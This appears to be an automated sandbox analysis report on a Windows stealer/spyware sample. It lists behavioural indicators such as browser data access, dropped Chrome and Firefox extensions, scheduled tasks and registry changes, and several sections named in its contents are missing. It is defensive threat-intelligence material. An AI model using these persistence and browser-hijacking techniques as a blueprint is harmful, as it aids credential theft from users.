Malware Analysis Report

2024-11-30 02:43

Sample ID 240407-vjg2pshf87
Target d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833
SHA256 d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833
Tags
discovery spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833

Threat Level: Likely malicious

The file d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833 was found to be: Likely malicious.

Malicious Activity Summary

discovery spyware stealer

Blocklisted process makes network request

Reads user/profile data of web browsers

Checks BIOS information in registry

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Checks installed software on the system

Drops desktop.ini file(s)

Drops Chrome extension

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Creates scheduled task(s)

Modifies data under HKEY_USERS

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-07 17:01

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-07 17:00

Reported

2024-04-07 17:03

Platform

win10v2004-20240226-en

Max time kernel

91s

Max time network

93s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\vAelVis.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\vAelVis.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File created C:\Program Files (x86)\orRvbnhdU\BoIyvtW.xml C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File created C:\Program Files (x86)\YrliKKkuhgWU2\vqoJCaF.xml C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File created C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\aoJBGiA.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File created C:\Program Files (x86)\ycfBUKIjHxeOC\CUnMhGJ.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File created C:\Program Files (x86)\orRvbnhdU\cJnNzB.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File created C:\Program Files (x86)\YrliKKkuhgWU2\qcPJmnQNozuBD.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File created C:\Program Files (x86)\ycfBUKIjHxeOC\DSqYrZi.xml C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File created C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\dbotFoU.xml C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File created C:\Program Files (x86)\IgAQuzzvNCUn\LfHJfAd.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bEcIFlOHxifjjBuFoU.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\aUYdFpynDtMaquqaO.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\yozVwwMRZiDXbVH.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\YGcJOiVocZfwUgdee.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\vAelVis.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{fb412698-0000-0000-0000-d01200000000}\NukeOnDelete = "0" C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
